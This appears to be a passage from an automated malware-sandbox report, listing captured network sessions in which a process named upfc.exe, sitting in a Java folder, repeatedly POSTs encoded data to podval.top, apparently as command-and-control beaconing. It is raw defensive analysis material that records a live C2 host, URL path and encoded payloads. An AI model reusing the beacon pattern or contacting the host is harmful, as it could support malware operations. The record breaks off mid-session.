                                                    Data Ascii: _SZX[VWPXVUQP]YSU[^TQTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&A0:73V?])X9T4=!.5]&5.$0+,.?[ 2 X,<"['$Y 5
                                                    Jul 3, 2024 16:42:30.838303089 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:31.185659885 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:31 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeKrjeVUbRw0nt5bX2PQmWlysxupYCAcZLmEIo%2BDholkc49jlWWl7%2B5cotO5Px796XtqqMLZYLnA9HJ%2BCiEOfRI%2BIL5ablaSlMpg5ZpK5Lck1HBrkxPj43MHlrAm"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a47e7b0c7ce2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.1049744188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:31.312539101 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:31.666497946 CEST1060OUTData Raw: 5a 56 5a 58 5e 58 52 5b 58 56 55 51 50 50 59 54 55 59 5e 5d 51 5e 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZVZX^XR[XVUQPPYTUY^]Q^SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z&/$)'#*:7&:!['"'U<--?7?,"['$Y
                                                    Jul 3, 2024 16:42:31.763647079 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:32.099236965 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofPTLlGC75RyWUNhIWEAp1m1h0HZdyla1leiLQTC3qRyoa7UcC6ZtLCUw8nl1fSomFtQsqxL%2F2LuAlpi5Tl2VkZod8cMQs74EGluEMA1S906q2loeOlniRrlGumF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a48438fc421c-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.1049745188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:32.235315084 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:32.588375092 CEST1060OUTData Raw: 5a 50 5f 5b 5b 5b 57 5f 58 56 55 51 50 5c 59 54 55 50 5e 5e 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP_[[[W_XVUQP\YTUP^^Q^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\19$94$0<>>#-%:-X$&30?S-=<4,,"['$Y 1
                                                    Jul 3, 2024 16:42:32.717751026 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:33.061202049 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ickc%2BTP6T9wsVzhDkVSoiZTLKvsZogWrWnQ6RFQgpJmjmGCZxB%2FWXnduVajKWQkGbhz6vZpbJrHbUa0q2ynZxgvMB9lxe59rYb5CCkIKULip0p8xwRGmy7L1T9K4"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a48a282f72ad-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.1049746188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:33.188224077 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:33.541723013 CEST1060OUTData Raw: 5f 55 5a 5f 5e 5f 52 5a 58 56 55 51 50 5f 59 52 55 5b 5e 5b 51 5a 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ_^_RZXVUQP_YRU[^[QZS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z%:8D&)+$V$*U *9>9Y'%!0 3W/<4#-,"['$Y =
                                                    Jul 3, 2024 16:42:33.663880110 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:34.013711929 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:33 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FEbnBp0zdq42gfJU39p%2BerSZLhcHwXPo8U65bBmRaqtnRPqICHvDksLCPgw5A%2B6TQ3f4RqM3nLCKHROwv8pWjPWfq6uLWnGhuJSEwmZGOmHp%2Bye0hJPmN7zEg%2BUi"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a49018efc420-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.1049747188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:34.141742945 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:34.494729042 CEST1060OUTData Raw: 5f 52 5f 5a 5b 5b 52 5c 58 56 55 51 50 5f 59 56 55 50 5e 5d 51 5c 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_Z[[R\XVUQP_YVUP^]Q\S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&9A'*43'\>>.#>,>9Y'9Y$7;X7#","['$Y =
                                                    Jul 3, 2024 16:42:34.612957001 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:34.947860956 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ha5LOKZVpzP0Rn8j71SpWzCsNPmgfiknj9%2FdxhYbsPhqG1SnzndEGsJiDYf8WpOqbCEueN8T812KwkDlUvZphd%2BwSH07Eld6dpaAkW9rYz%2BGrchtrmqElGwmoUhh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4960f654204-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.1049748188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:34.987618923 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:35.340346098 CEST1772OUTData Raw: 5a 52 5f 5a 5b 5c 57 5d 58 56 55 51 50 5e 59 50 55 5b 5e 5a 51 54 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_Z[\W]XVUQP^YPU[^ZQTS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%98E3)]%0(-9U4-.=&%63//> ',<"['$Y
                                                    Jul 3, 2024 16:42:35.450520992 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:35.794322968 CEST793INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VJLg2G9JjnLF8HZdasj0tGt4lrthTI0bY87YHJ17Ke6li4eOOH1yRKrI6eEPz15aZD3n7HriLWTbjxnUXABlk3ocHhW%2FKXai2LRV8eRtiwqWuDBoj9J7BY69JO6"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a49b4d639e02-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 64 63 0d 0a 09 1a 26 05 27 39 31 5d 26 32 2f 16 39 2d 38 0e 2b 2d 3f 04 3b 00 26 07 2a 34 26 03 3a 00 32 55 23 3a 26 5c 2a 2f 24 15 25 09 2f 08 21 31 20 5b 04 1c 23 5d 3e 39 21 5f 29 28 2b 53 25 3c 26 1f 25 24 3a 05 33 3b 21 0f 27 28 06 05 3f 06 13 1e 30 0b 24 05 3d 16 2d 02 28 09 22 58 36 1e 21 54 02 13 22 55 27 03 3a 0e 20 1e 28 0c 31 1e 39 1b 33 27 33 53 33 1d 2d 0b 29 0d 04 56 24 1f 15 05 35 01 23 57 33 38 31 07 33 04 3a 04 21 02 23 5f 2b 00 07 5a 34 06 1d 39 38 29 11 5c 3c 38 11 2a 0f 29 54 29 3e 31 04 2e 30 58 08 5e 3c 31 20 0b 0e 39 57 30 3c 00 06 0b 3c 2c 1b 1b 3c 3a 19 32 24 06 57 39 3b 09 1e 21 02 07 2e 52 39 05 3e 23 00 5a 00 18 3a 1c 3d 00 0c 3f 57 5f 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: dc&'91]&2/9-8+-?;&*4&:2U#:&\*/$%/!1 [#]>9!_)(+S%<&%$:3;!'(?0$=-("X6!T"U': (193'3S3-)V$5#W3813:!#_+Z498)\<8*)T)>1.0X^<1 9W0<<,<:2$W9;!.R9>#Z:=?W_0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.1049749188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:35.206255913 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:35.557178974 CEST1060OUTData Raw: 5f 5b 5a 5e 5b 5c 57 59 58 56 55 51 50 5b 59 5a 55 5c 5e 5d 51 5a 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[Z^[\WYXVUQP[YZU\^]QZSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%03:+'#[(=1U#>)[,.-'=Z$+;;Y7(8"['$Y -
                                                    Jul 3, 2024 16:42:35.665199041 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.016758919 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:35 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFq64FuDlWf5umKSrSnHZ1YJ9KFjQ3j39psp%2Fu5w4xZqEZZsK6mk5JEsa6bw4YU4jTcQ8FGu1OeXYwb2NdmmbviXbgkBNhRe0qVetWv7bWwnZFn4qSaJqSr7hNP%2F"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a49c9f65c411-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:42:36.054222107 CEST269OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 500
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:36.151065111 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.151331902 CEST500OUTData Raw: 5f 52 5f 54 5b 5d 57 50 58 56 55 51 50 51 59 5a 55 5c 5e 5b 51 5a 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_T[]WPXVUQPQYZU\^[QZSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&*;' '0$=.5T#.>:>$&&$U#;X'[488"['$Y


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.1049750188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:36.174698114 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:36.525840044 CEST1060OUTData Raw: 5a 55 5a 58 5b 56 57 59 58 56 55 51 50 51 59 54 55 5c 5e 55 51 58 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZX[VWYXVUQPQYTU\^UQXS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]')/$)4%0;\)>-R!=5Y:-Y'%"0(-=;[ 23/"['$Y
                                                    Jul 3, 2024 16:42:36.624550104 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.974387884 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMFNwN7zq%2Fa%2FSqm5dJfc6hxAs4Eqhzro%2FrL0dsQUlLBna1UHCmInjz8PTaPtr9TaDrhl6G1ZVcvyZAfhCODKWB7x9Fh0gTpDmx3NJVRkpAnX0UhkpGkNWlrq98D3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a29d1e8c8a-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0
                                                    Jul 3, 2024 16:42:36.975984097 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:37.071537018 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:37.071774006 CEST1772OUTData Raw: 5a 56 5f 5a 5b 56 57 5e 58 56 55 51 50 5c 59 54 55 51 5e 55 51 58 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_Z[VW^XVUQP\YTUQ^UQXSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!20_%0(-&7[*,>%Y'%%\03S/-'78Y;"['$Y 1
                                                    Jul 3, 2024 16:42:37.397105932 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKl1efTz9xVD6czCPHcA12kw4eQ%2B0RzKw7Rj1m6HPX1mIEkm7KHLGSEUcEngqPhL24vr8obriI%2BpgPOWljzKS%2BzpquBpAI92WwPC%2FEHzijNlUWNyDqj155e%2BRXWM"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a5699a8c8a-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 01 26 29 3d 5b 32 32 27 18 2c 3d 0e 0e 2b 2d 06 16 2f 29 2e 06 28 1a 3d 59 2d 58 2e 1b 23 29 35 05 3c 5a 27 06 26 1e 02 56 23 21 20 5b 04 1c 20 04 3c 5c 36 03 2b 28 28 0e 32 5a 2a 1f 25 27 31 59 24 3b 2e 57 25 2b 3b 5c 2b 01 35 57 33 0c 23 5d 2a 28 32 5e 3f 24 3a 5b 36 0e 21 54 02 13 21 0c 30 2d 29 56 20 0e 05 11 25 20 35 5f 27 27 2f 19 33 0d 29 0e 3e 0d 2d 0f 27 08 20 11 36 2c 3b 53 26 38 0c 5b 24 04 3d 5a 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&)=[22',=+-/).(=Y-X.#)5<Z'&V#! [ <\6+((2Z*%'1Y$;.W%+;\+5W3#]*(2^?$:[6!T!0-)V % 5_''/3)>-' 6,;S&8[$=Z!(#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.1049751188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:36.194538116 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 2048
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:36.541493893 CEST2048OUTData Raw: 5a 57 5a 5f 5e 5f 57 51 58 56 55 51 50 59 59 5a 55 50 5e 59 51 55 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZWZ_^_WQXVUQPYYZUP^YQUSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!29(C$) %0 *-S#-"9=X$![3+;'Y72[8,"['$Y
                                                    Jul 3, 2024 16:42:36.655148983 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:36.856863022 CEST588INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1VS3ZJ%2BVA4orlRxyy1pvi0WDEeRb%2BxCa%2FoyFJfcCFiZanU39GbcZfJkYXpMmnyii6Fe%2F9QueQf%2FJr1SYRrJrfOowRN76zaOuKvkSGq6aFa0W4V%2BKskYT%2B6CJe4i"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4a2cf267ce2-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.1049752188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:37.111917973 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
